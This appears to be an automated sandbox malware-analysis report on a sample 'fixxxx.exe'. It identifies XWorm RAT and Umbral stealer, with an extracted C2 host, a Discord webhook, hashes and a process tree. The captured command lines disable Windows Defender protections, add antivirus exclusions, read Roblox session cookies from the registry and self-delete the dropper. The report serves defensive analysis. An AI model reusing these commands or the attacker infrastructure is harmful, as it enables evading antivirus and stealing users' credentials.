Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    02-07-2024 15:07

General

  • Target

    fixxxx.exe

  • Size

    1.1MB

  • MD5

    656c98a712018e49c94e823f1f30d038

  • SHA1

    f7400c9f13174b924c822871053fb1efa97a43b6

  • SHA256

    136cec1df46a4a97e2358e7b1ddcca2ec2853ecad6e004cbd959844d1e96d0e0

  • SHA512

    300b82e08c08391a369706a77907471527a6325909f64ed9c6e316b89f3e0659ddc0619bba1ee857f2b2a14865b3248161079e066ea6f3d6d340617f56a6a068

  • SSDEEP

    24576:Ut9UwrSmTCEu3LIy+PtTFngKrh67y8pWaUTNTfkROL6bE:C9PWDIB5Fnfrx8W1hn/

Malware Config

Extracted

Family

xworm

C2

20.ip.gl.ply.gg:53765

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1257705373842931812/tC0mK-jq5cX6npMOy_YAUDvD9Mp63k-HX1Zs0JwsyvoUpCeh4vfi_Qv8ttDXKYlNJiJD

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fixxxx.exe
    "C:\Users\Admin\AppData\Local\Temp\fixxxx.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fixxxx.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2184
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fixxxx.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2716
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2692
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2452
    • C:\Users\Admin\AppData\Local\Temp\iehjot.exe
      "C:\Users\Admin\AppData\Local\Temp\iehjot.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1432
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\iehjot.exe"
        3⤵
        • Views/modifies file attributes
        PID:2632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\iehjot.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:788
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1512
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1644
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:648
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1640
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
          PID:2884
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2392
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          3⤵
          • Detects videocard installed
          PID:1732
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\iehjot.exe" && pause
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2364
          • C:\Windows\system32\PING.EXE
            ping localhost
            4⤵
            • Runs ping.exe
            PID:2400

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      2cb3c0bf16ed58d1b05f5fcb617a463c

      SHA1

      d34d098f9d3a7422ebfb0fd86196198c258aa2c7

      SHA256

      cfe2c32b6b0ca41f8fc029d30a1fa8be59b962aaa35d2499120a089103e983cb

      SHA512

      71fb57b49359366669a390cae5b0cdbf8cdf41dfe9b896c35805ac3b53f245cb81f646af61a938e964b90043aa4ed72fe104a032fa77e0ded26e6bc78e773dfe

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      b23a5d200c0c473bc8f94d78cf84b0dc

      SHA1

      17b9a851df8756acb9d2b537e219db4047ff6afa

      SHA256

      e8af3f97ed0c56e58df563050b862889dc3da95e488ea7b9825e9c6ad1df768e

      SHA512

      49e2fe858920cf64ed6a170d3bc0e31c964123dd258995660277d4ea32bda297b7f8deb204c2a33e7cceb707c016cb703704b33709f20ac7bf12feaf9152316c

    • \Users\Admin\AppData\Local\Temp\iehjot.exe

      Filesize

      231KB

      MD5

      cc9a35c145b9603d30c07fa7995390ea

      SHA1

      e4dd1a40aa0e5a1a7cfae14e76ebab05d51a0b69

      SHA256

      8a18073f8f287ccd1f0cf93ae325e84426073bfd07593ea736e7ec0bb9a35efe

      SHA512

      ee8145b5927c8395455a3ed7bf4f557a66035bdb7354d519045c51ce44a9b39922fa7b2288a6694cbc2a542c2f623ef309ff4d3f5029aea6ee94b9f005120b95

    • memory/788-49-0x000000001B590000-0x000000001B872000-memory.dmp

      Filesize

      2.9MB

    • memory/788-50-0x0000000001D20000-0x0000000001D28000-memory.dmp

      Filesize

      32KB

    • memory/1432-37-0x00000000001A0000-0x00000000001E0000-memory.dmp

      Filesize

      256KB

    • memory/2392-75-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

      Filesize

      32KB

    • memory/2968-21-0x00000000008A0000-0x0000000000C14000-memory.dmp

      Filesize

      3.5MB

    • memory/2968-26-0x0000000000840000-0x000000000084C000-memory.dmp

      Filesize

      48KB

    • memory/2968-0-0x00000000008A0000-0x0000000000C14000-memory.dmp

      Filesize

      3.5MB

    • memory/2968-1-0x00000000008A0000-0x0000000000C14000-memory.dmp

      Filesize

      3.5MB

    • memory/3068-42-0x000000001B650000-0x000000001B932000-memory.dmp

      Filesize

      2.9MB

    • memory/3068-43-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

      Filesize

      32KB